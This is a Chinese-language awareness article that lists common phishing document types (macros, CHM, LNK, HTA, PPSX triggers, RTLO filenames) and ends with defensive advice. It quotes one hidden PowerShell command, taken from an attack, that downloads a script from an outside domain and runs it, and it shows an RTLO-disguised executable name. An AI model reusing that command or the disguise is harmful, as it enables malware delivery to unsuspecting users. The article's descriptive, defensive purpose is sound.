钓鱼方式分为几种(常见钓鱼方法分类)

社会工程学,是一种通过对受害者好奇心、信任、贪婪、心理弱点、本能反应等心理陷阱进行诸如欺骗、伤害等危害手段。

在生活工作中,最常使用的邮件、各种文档也成为黑客常用的攻击载体。

而最常见的社会工程学攻击方式之一就是网络钓鱼。网络钓鱼攻击趋势也一直呈增长趋势,特别是在APT攻击、勒索软件攻击等事件中,扮演了重要的角色。

那么常见的钓鱼文档的种类有哪些呢?

1、Office宏

宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。由于早些年宏病毒泛滥,现在Office的宏功能已经默认是禁用,但依然无法阻挡攻击者使用宏。那么如何引诱受害者开启宏功能就是关键了,常用的套路:

  • 文档是被保护状态,需要启用宏才能查看;
  • 添加一张模糊的图片,提示需要启用宏才能查看高清图片;
  • 提示要查看文档,按给出的一系列步骤操作;
  • 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护。

恶意宏代码在免杀和增加分析难度的手段上也多种多样,除了把VBA代码混淆变形外,利用Excel的特性隐藏代码也很常见。

利用OLEDump工具,可以看到这段宏代码是读取了这部分内容进行恶意文件的下载。

2、CHM文档

CHM是Windows帮助文件(如电子书)使用的扩展名,此文件可以被植入可执行代码。成功的利用需要欺骗用户打开恶意的CHM文件,该文件可用于执行恶意代码。其缺点就是打开时会出现弹黑框、卡顿,容易被察觉。

上图是一例恶意CHM文档,打开或点击左侧标题时就会执行powershell代码。通过HH.exe进行反汇编可以看到其执行代码。

CHM文件的利用虽然历史悠久,但通过免杀手段依然活跃,著名的Cobalt Strike就支持CHM钓鱼文件的生成。

3、内嵌链接

在PDF、Office文档中内嵌一个跳转链接是很早期的钓鱼方式,通过文字信息的引导,让受害者点开页面,如果缺乏戒心,就可能会获取到受害者的账号、密码、银行卡、身份证等信息。

Office、Adobe等应用软件目前都对打开外部链接都会弹框进行安全提醒,这种方式也比较容易引起人类警觉。

4、漏洞利用

利用Office、Adobe、IE等应用软件的漏洞,精心制作成诱饵文档,是APT攻击中的常客。现实中可能不会及时更新打补丁,这种攻击方式的成功率是比较高的。这类文档除了挑选漏洞外,对文件命名也煞费苦心,通常会起最近的热点新闻,或跟自身相关的名字,让人看了不得不点开看看。

捆绑了漏洞的文档,如果需要完美执行,不被察觉,还是比较困难的,不过只要达到目的,只要被打开就完成一大半了。我们可以简单的从几个细节来判断打开的文档是否有问题:

  • 打开后文件变小,因为病毒体被释放,原始文件被干净的文档替换,如果没注意原始大小,也可以从创建时间判断;
  • 文档打开后,office程序自动退出,又自动打开了文档,第二次打开明显快了;
  • 文档运行报错,又或者自行安装你不知道什么的程序;
  • 文档打开缓慢,系统卡顿较长时间;
  • 文档打开后,显示的内容与标题不符,或者是乱码,甚至没什么内容。

随着新冠病毒的爆发,很多行业领域都遭受到带有COVID-19社会工程主题的钓鱼攻击,大多捆绑了勒索软件。

5、PPT手势触发

如果文档一打开就触发已经玩腻了,那么在PPT里设置动作触发一行命令执行,就比较少见了。在历史攻击中就出现过这种利用方式,把ppt配置成ppsx后缀,双击运行后就是播放模式,鼠标只要划过指定区域就会执行一段代码,美中不足的是会被弹框警告,如果不警惕点了启用就中招了。

其在运行程序里设置的代码如下:

powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('http:' [char] 0x2F [char] 0x2F 'cccn.nl' [char] 0x2F 'c.php',\"$env:temp\ii.jse\"); Invoke-Item \"$env:temp\ii.jse\""

6、LNK文件

LNK(快捷方式或符号链接)是引用其他文件或程序的方法,最著名的就是震网病毒(Stuxnet)中的利用,在最新的利用样本也有很多,先看一例。

通过分析工具,把执行代码Dump出来,如下图。

快捷方式修改的利用方式,在MITRE ATT@CK中的ID是T0123,攻击者可以使用这种方式来实现持久化。

7、HTA文件

HTA是HTML Application的缩写,直接将HTML保存成HTA的格式,是一个独立的应用软件,本身就是html应用程序,双击就能运行,却比普通网页权限大得多,它具有桌面程序的所有权限。Cobalt Strike也支持HTA钓鱼文件的生成,另有勒索软件(Locky家族)使用HTA作为传播载体。

8、文件后缀RTLO

伪装文件中有个比较古老的方式,但依然会在攻击中看到它的身影。RTLO字符全名为“RIGHT-TO-LEFT OVERRIDE”,是一个不可显示的控制类字符,其本质是unicode 字符。可以将任意语言的文字内容按倒序排列,最初是用来支持一些从右往左写的语言的文字,比如阿拉伯语,希伯来语。由于它可以重新排列字符的特性,会被攻击者利用从而达到欺骗目标,使得用户运行某些具有危害性的可执行文件。

#在命令行下可以看到完整的文件名 '使用帮助-如何删除ghost-'$'\342\200\256''cod.exe

RTLO使用的关键字符就是U 202E,配合修改文件的图标,还是很具有迷惑性的。

总结

除了以上列举的,钓鱼文档的种类还有很多。针对钓鱼攻击,具备良好的安全意识才是最有效的防范。对于一些来路不明的文件,即使文件名再吸引人,也不能立马双击打开,同时要及时安装安全补丁。

(0)

相关推荐

  • Word2003文档打不开的几种常见解决方法

    Word2003文档打不开的几种常见解决方法 步骤/方法 01 将"%appdata%\microsoft\templates"粘贴到"运行",回车,删除nor ...

  • USB设备失灵怎么办 USB设备不能用的几种常见解决方法

    一、设置CMOS参数 对于从来没有使用过USB外接设备的朋友来说,即使正确安装了驱动程序也有可能出现系统无法检测USB硬盘的情况,这主要是由于主板默认的CMOS端口是关闭的,如果没有将其设置为开启状态 ...

  • 网站被攻击的几种常见方式及处理方法

    网站上线后,后期维护是相当重要的,在这个工程中我们最该注意的就是网站安全.最近有几个站长朋友问我,我的站被攻击了该如何办呢?下面我就举出几个常见的攻击方式以及个人的处理建议.希望对大家有一定的帮助. ...

  • 配置本地路由的几种常见方法介绍

    本文主要和大家分享如何配置本地路由的几种常见方法,希望给大家提供多一些网络基础知识! 为了有效提高工作效率,不少规模较大的单位把局域网按照一定的规律分成了许多不同用途的子网,要想让不同子网之间相互能够 ...

  • 几种常见的屏蔽电脑USB接口的方法

    如何控制电脑USB接口? USB是一个外部总线标准,用于规范电脑与外部设备的连接和通讯。USB接口即插即用和热插拔功能。USB接口可连接127种外设,如鼠标和键盘等。它已成为当今电脑与大量智能设备的必 ...

  • 用Excel制作工资条的几种常见方法

    用Excel制作工资条的几种常见方法 一.复制粘贴法 大家最容易想的方法就是复制标题行,在每一位员工数据行的上方粘贴,手动完成工资条的制作: 1.选择A1:G1单元格,复制标题行. 2.右击第3行行号 ...

  • PPT几种常见的处理方法

    PPT几种常见的处理方法 以图片和图例型文字为主,减少大篇纯文字的使用,增强视觉化 页面中夹杂一些非常规的版式,打破规则,更具活泼和视觉感 减少设计中的过多装饰,摒除冗杂,适当使用单纯的线条.色块,会 ...

  • 八种常见Excel错误提示及问题解决方法

    八种常见Excel错误提示及问题解决方法 1.#####! 原因:如果单元格所含的数字.日期或时间比单元格宽,或者单元格的日期时间公式产生了一个负值,就会产生#####!错误. 解决方法:如果单元格所 ...

  • win7系统黑屏了怎么办?win7系统电脑发生黑屏的九种常见原因及解决方法

    说到win7系统电脑黑屏问题,相信大家都不会陌生了,而导致win7系统电脑黑屏的原因有很多种,许多电脑小白遇到黑屏状况就束手无策了,不知道怎么解决.所以今天小编给大家讲解win7系统电脑发生黑屏八种常 ...